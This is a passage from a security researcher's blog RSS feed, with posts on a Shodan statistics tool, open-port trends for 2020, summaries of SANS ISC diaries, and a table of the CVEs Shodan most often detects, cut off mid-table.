        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>TriOp</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>TriOp - Tool for quickly gathering statistical information from Shodan.io</title>
        <link>https://untrustednetwork.net/en/triop/</link>
        <pubDate>Tue, 26 Jan 2021 07:30:00 +0100</pubDate>
        
        <atom:modified>Tue, 26 Jan 2021 07:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/triop/</guid>
        <description>TriOp is a tool for quickly gathering information from Shodan.io about the number of IPs which satisfy large number of different queries. Generally, it may be useful to security researchers who wish to use data gathered from Shodan over time as a part of their research (e.g. to show how number of systems exposing remote access protocols to the internet changed as a reaction to new movement restrictions connected to the Covid-19 pandemic) and to CSIRTs, especially national ones, that wish to monitor their constituencies for changes and/or vulnerabilities, but lack the technical tooling that would enable them to periodically scan all of their external IP ranges.</description>
        <content:encoded>&lt;p&gt;TriOp is a tool for quickly gathering information from Shodan.io about the number of IPs which satisfy large number of different queries. Generally, it may be useful to security researchers who wish to use data gathered from Shodan over time as a part of their research (e.g. to show &lt;a href=&#34;https://isc.sans.edu/forums/diary/Couple+of+interesting+Covid19+related+stats/26374/&#34;&gt;how number of systems exposing remote access protocols to the internet changed as a reaction to new movement restrictions connected to the Covid-19 pandemic&lt;/a&gt;) and to CSIRTs, especially national ones, that wish to monitor their constituencies for changes and/or vulnerabilities, but lack the technical tooling that would enable them to periodically scan all of their external IP ranges.&lt;/p&gt;
&lt;p&gt;In its most basic mode of operation, TriOp takes a list of searches as an input and displays number of systems, which Shodan sees, which satisfy the search. The outputs may be saved in a CSV, which enables you to monitor &amp;ldquo;counts&amp;rdquo; for the same set of searches over time.&lt;/p&gt;
&lt;p&gt;TriOp also enables you to quickly generate list(s) of searches from parameters, which are relevant for you (e.g. if you provide a list of searches and a list of countries, the tool will generate a relevant search list for each of the countries).&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/misc/triop.png&#34; alt=&#34;TriOp&#34; style=&#34;width:400px&#34;&gt;
&lt;br&gt;
&lt;p&gt;All that is necessary to use TriOp is a valid API key, which comes with every Shodan.io account (even a free one), and to have Python 3 with the &lt;a href=&#34;https://pypi.org/project/shodan/&#34;&gt;Shodan Python library&lt;/a&gt; installed.&lt;/p&gt;
&lt;p&gt;The tool may be downloaded from &lt;a href=&#34;https://github.com/NettleSec/TriOp&#34;&gt;my GitHub page&lt;/a&gt; and bellow you may find a short tutorial showing its use in greater detail.&lt;/p&gt;
&lt;p align=&#34;center&#34;&gt;&lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/pp9lD58Dc-w&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt;&lt;/iframe&gt;&lt;br&gt;
&lt;kbd&gt;Direct URL: &lt;a href=&#34;https://www.youtube.com/watch?v=pp9lD58Dc-w&#34;&gt;https://www.youtube.com/watch?v=pp9lD58Dc-w&lt;/a&gt;&lt;/kbd&gt;&lt;/p&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tool</category>
            
          
            
              <category>TriOp</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - From a small BAT file to Mass Logger infostealer</title>
        <link>https://untrustednetwork.net/en/2021/01/04/sans-isc-diary-from-a-small-bat-file-to-mass-logger-infostealer/</link>
        <pubDate>Mon, 04 Jan 2021 15:50:00 +0100</pubDate>
        
        <atom:modified>Mon, 04 Jan 2021 15:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/01/04/sans-isc-diary-from-a-small-bat-file-to-mass-logger-infostealer/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at an interesting BAT file from 2020, which turned out to be a downloader for the Mass Logger infostealer.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/26946&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at an interesting BAT file from 2020, which turned out to be a downloader for the Mass Logger infostealer.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Malware Analysis</category>
            
          
            
              <category>Trojan</category>
            
          
            
              <category>Mass Logger</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Open ports statistics for 2020</title>
        <link>https://untrustednetwork.net/en/2021/01/01/open-ports-statistics-for-2020/</link>
        <pubDate>Fri, 01 Jan 2021 17:00:00 +0200</pubDate>
        
        <atom:modified>Fri, 01 Jan 2021 17:00:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/01/01/open-ports-statistics-for-2020/</guid>
        <description>The last quarter of 2020 is behind us, which means it&amp;rsquo;s time for another look at some of the interesting ports accessible on public IPs. This time however, we will take a look at how the internet changed during the whole of 2020, not just at the past 3 months.
I would especially like to bring to your attention the steady decrease in ICS systems connected to the internet during 2020.</description>
        <content:encoded>&lt;p&gt;The last quarter of 2020 is behind us, which means it&amp;rsquo;s time for another look at some of the interesting ports accessible on public IPs. This time however, we will take a look at how the internet changed during the whole of 2020, not just at the past 3 months.&lt;/p&gt;
&lt;p&gt;I would especially like to bring to your attention the steady decrease in ICS systems connected to the internet during 2020. Although Shodan still sees almost 100k of IP addresses running services communicating using industrial protocols, it is over 30k less then it saw at the beginning of the year.&lt;/p&gt;
&lt;p&gt;As always, the data, on which the following charts are based, have been gathered using &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the &lt;a href=&#34;https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/&#34;&gt;first post with quarterly statistics&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Should you be interested in the port situation in the Czech Republic, you may find corresponding charts &lt;a href=&#34;https://untrustednetwork.net/cs/2021/01/01/otev%C5%99en%C3%A9-porty-v-roce-2020/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Bellow, you may find charts for the following protocols and ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ssh&#34;&gt;SSH (port 22)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#telnet&#34;&gt;Telnet (port 23)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#dns&#34;&gt;DNS (port 53)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ntp&#34;&gt;NTP (port 123)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#snmp&#34;&gt;SNMP (port 161)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smb&#34;&gt;SMB (port 445)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#rdp&#34;&gt;RDP (port 3389)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;web&#34;&gt;Web&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#web&#34;&gt;HTTP (port 80)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#https&#34;&gt;HTTPS (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;e-mail&#34;&gt;E-mail&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#smtp&#34;&gt;SMTP (port 25)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smtps&#34;&gt;SMTPS (port 465)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imap&#34;&gt;IMAP (port 143)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imaps&#34;&gt;IMAPS (port 993)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3&#34;&gt;POP3 (port 110)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3s&#34;&gt;POP3S (port 995)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreficsindustrial-control-systems-icsa&#34;&gt;&lt;a href=&#34;#ics&#34;&gt;Industrial Control Systems (ICS)&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#modbus&#34;&gt;Modbus (port 502)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#bacnet&#34;&gt;BACnet/IP (port 47808)&lt;br /&gt;
&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h4 id=&#34;ssh&#34;&gt;SSH (port 22)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/ssh.png&#34; alt=&#34;SSH&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;telnet&#34;&gt;Telnet (port 23)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/telnet.png&#34; alt=&#34;Telnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;dns&#34;&gt;DNS (port 53)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/dns.png&#34; alt=&#34;DNS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ntp&#34;&gt;NTP (port 123)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/ntp.png&#34; alt=&#34;NTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;snmp&#34;&gt;SNMP (port 161)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/snmp.png&#34; alt=&#34;SNMP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smb&#34;&gt;SMB (port 445)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/smb.png&#34; alt=&#34;SMB&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;rdp&#34;&gt;RDP (port 3389)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/rdp.png&#34; alt=&#34;RDP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;http&#34;&gt;HTTP (port 80)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/http.png&#34; alt=&#34;HTTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;https&#34;&gt;HTTPS (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/https.png&#34; alt=&#34;HTTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtp&#34;&gt;SMTP (port 25)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/smtp.png&#34; alt=&#34;SMTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtps&#34;&gt;SMTPS (port 465)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/smtps.png&#34; alt=&#34;SMTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imap&#34;&gt;IMAP (port 143)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/imap.png&#34; alt=&#34;IMAP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imaps&#34;&gt;IMAPS (port 993)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/imaps.png&#34; alt=&#34;IMAPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3&#34;&gt;POP3 (port 110)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/pop3.png&#34; alt=&#34;POP3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3s&#34;&gt;POP3S (port 995)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/pop3s.png&#34; alt=&#34;POP3S&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ics&#34;&gt;All ICS protocols&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/ics.png&#34; alt=&#34;All ICS protocols&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;modbus&#34;&gt;Modbus (port 502)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/modbus.png&#34; alt=&#34;Modbus&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/eibnet.png&#34; alt=&#34;EIBnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;bacnet&#34;&gt;BACnet/IP (port 47808)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q4/bacnet.png&#34; alt=&#34;BACnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/ports/2020/q4/ics.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>DNS</category>
            
          
            
              <category>NTP</category>
            
          
            
              <category>SNMP</category>
            
          
            
              <category>SMB</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>SMTPS</category>
            
          
            
              <category>IMAP</category>
            
          
            
              <category>IMAPS</category>
            
          
            
              <category>POP3</category>
            
          
            
              <category>POP3S</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>EIBnet</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>Open port statistics</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - TLS 1.3 is now supported by about 1 in every 5 HTTPS servers</title>
        <link>https://untrustednetwork.net/en/2020/12/30/sans-isc-diary-tls-1.3-is-now-supported-by-about-1-in-every-5-https-servers/</link>
        <pubDate>Wed, 30 Dec 2020 12:55:00 +0100</pubDate>
        
        <atom:modified>Wed, 30 Dec 2020 12:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/12/30/sans-isc-diary-tls-1.3-is-now-supported-by-about-1-in-every-5-https-servers/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at the increse in support of TLS 1.3 by HTTPS servers and the decrease in support of SSL 2.0.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/TLS+13+is+now+supported+by+about+1+in+every+5+HTTPS+servers/26936/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at the increse in support of TLS 1.3 by HTTPS servers and the decrease in support of SSL 2.0.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Want to know what&#39;s in a folder you don&#39;t have a permission to access? Try asking your AV solution...</title>
        <link>https://untrustednetwork.net/en/2020/12/29/av_listing_bypass/</link>
        <pubDate>Tue, 29 Dec 2020 15:20:00 +0100</pubDate>
        
        <atom:modified>Tue, 29 Dec 2020 15:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/12/29/av_listing_bypass/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look a small issue present in many anti-malware tools, which may be used to bypass file system level folder listing permissions.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Want+to+know+whats+in+a+folder+you+dont+have+a+permission+to+access+Try+asking+your+AV+solution/26932/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look a small issue present in many anti-malware tools, which may be used to bypass file system level folder listing permissions.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Antivirus</category>
            
          
            
              <category>Information disclosure</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A slightly optimistic tale of how patching went for CVE-2019-19781</title>
        <link>https://untrustednetwork.net/en/2020/12/18/sans-isc-diary-a-slightly-optimistic-tale-of-how-patching-went-for-cve-2019-19781/</link>
        <pubDate>Fri, 18 Dec 2020 10:00:00 +0100</pubDate>
        
        <atom:modified>Fri, 18 Dec 2020 10:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/12/18/sans-isc-diary-a-slightly-optimistic-tale-of-how-patching-went-for-cve-2019-19781/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at how many publicly accessible systems are still vulnerable to CVE-2019-19781, AKA Shitrix.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/A+slightly+optimistic+tale+of+how+patching+went+for+CVE201919781/26900/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at how many publicly accessible systems are still vulnerable to CVE-2019-19781, AKA Shitrix.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Shitrix</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Most common vulnerabilities based on Shodan scans</title>
        <link>https://untrustednetwork.net/en/2020/11/18/most-common-vulnerabilities-based-on-shodan/</link>
        <pubDate>Wed, 18 Nov 2020 21:00:00 +0100</pubDate>
        
        <atom:modified>Wed, 18 Nov 2020 21:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/11/18/most-common-vulnerabilities-based-on-shodan/</guid>
        <description>My recent post on the Internet Storm Center website about the surprisingly high number of systems still affected by critical vulnerabilities, which have been patched for a long time, received quite a positive feedback. I have consequently decided to take a look at the issue in a more comprehensive manner and since I didn’t know, which vulnerabilities Shodan was able to detect, I’ve used my TriOp tool to gather data for all of the approximately 190k CVEs ever published.</description>
        <content:encoded>&lt;p&gt;My recent &lt;a href=&#34;https://isc.sans.edu/diary/26798&#34;&gt;post on the Internet Storm Center&lt;/a&gt; website about the surprisingly high number of systems still affected by critical vulnerabilities, which have been patched for a long time, received quite a positive feedback. I have consequently decided to take a look at the issue in a more comprehensive manner and since I didn’t know, which vulnerabilities &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt; was able to detect, I’ve used my &lt;a href=&#34;https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/&#34;&gt;TriOp tool&lt;/a&gt; to gather data for all of the approximately &lt;a href=&#34;https://cve.mitre.org/data/downloads/index.html&#34;&gt;190k CVEs ever published&lt;/a&gt;. After couple of days the script took to run, I have the results and they are quite interesting…&lt;/p&gt;
&lt;p&gt;Before we get to them though, let’s take a quick look at how many vulnerabilities is Shodan capable of detecting. The magic number seems to currently be 2246. Or, rather, that is the number of CVEs, for which Shodan detected at least one affected IP address. Since for each of 40 different CVEs it detected only 1 vulnerable IP and for 99 more CVEs it detected only between 2 and 10 affected IPs, it is quite possible that Shodan is capable of identifying other vulnerabilities as well, but it didn’t find them on any of the systems it scanned in the past few days or weeks.&lt;/p&gt;
&lt;p&gt;On the other hand, as you may see from the following chart, there are a significant number of CVEs for which Shodan detected over 1 million affected IP addresses – 145, to be specific.&lt;/p&gt;
&lt;p&gt;&lt;a id=&#34;vulnerabilities-histogram&#34; href=&#34;https://untrustednetwork.net/images/2020/13-shodan_vulns/vulns-histogram.png&#34;&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/13-shodan_vulns/vulns-histogram.png&#34; alt=&#34;Number of IP addresses affected by different CVEs&#34; style=&#34;max-width:700px;width:100%&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We won’t, for obvious reasons, discuss all of them but I thought that a closer look at the top 15 CVEs detected most often might be worth it, since all of these had more than 4 million detections.&lt;/p&gt;
&lt;p&gt;&lt;a id=&#34;top-15&#34; href=&#34;https://untrustednetwork.net/images/2020/13-shodan_vulns/top15.png&#34;&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/13-shodan_vulns/top15.png&#34; alt=&#34;Most common CVEs detected by Shodan&#34; style=&#34;max-width:700px;width:100%&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As the chart above shows, we have couple of sets of vulnerabilities with similar numbers of detections. This is mostly due to them affecting the same version of a specific system, which corresponds with the similar (and sometimes nearly sequential) CVE numbers.&lt;/p&gt;
&lt;p&gt;The most common vulnerability seems to be CVE-2017-15906, which affects OpenSSH and luckily isn’t too critical. That unfortunately can’t be said about some of the other ones, as three vulnerabilities (two in Apache and one in PHP), which have made it into the top 15, have CVSSv3 score 9.8. You may take a find details for all of the most commonly detected vulnerabilities in the following table.&lt;/p&gt;
&lt;table style=&#34;width:600px;margin: 0px auto;&#34; cellspacing=&#34;1&#34; border=&#34;1&#34;&gt;
    &lt;tr&gt;
        &lt;th style=&#34;text-align:center;padding:5px;color:black&#34;&gt;CVE&lt;/th&gt;
        &lt;th style=&#34;text-align:center;padding:5px;color:black&#34;&gt;Number of affected IP addresses&lt;/th&gt;
        &lt;th style=&#34;text-align:center;padding:5px;color:black&#34;&gt;CVSSv3&lt;/th&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2017-15906&#34;&gt;CVE-2017-15906&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;7,551,378&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5.3&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2018-1312&#34;&gt;CVE-2018-1312&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;6,936,210&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;9.8&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2019-0220&#34;&gt;CVE-2019-0220&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5,687,693&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5.3&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2017-7679&#34;&gt;CVE-2017-7679&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5,581,571&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;9.8&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2018-17199&#34;&gt;CVE-2018-17199&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5,392,949&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;7.5&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2018-15919&#34;&gt;CVE-2018-15919&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5,299,655&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5.3&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2016-8612&#34;&gt;CVE-2016-8612&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5,267,545&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4.3&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2016-4975&#34;&gt;CVE-2016-4975&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5,051,548&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;6.1&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2018-1283&#34;&gt;CVE-2018-1283&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,971,245&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;5.3&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2017-15715&#34;&gt;CVE-2017-15715&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,971,235&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;8.1&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2017-15710&#34;&gt;CVE-2017-15710&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,971,199&lt;/td&gt;
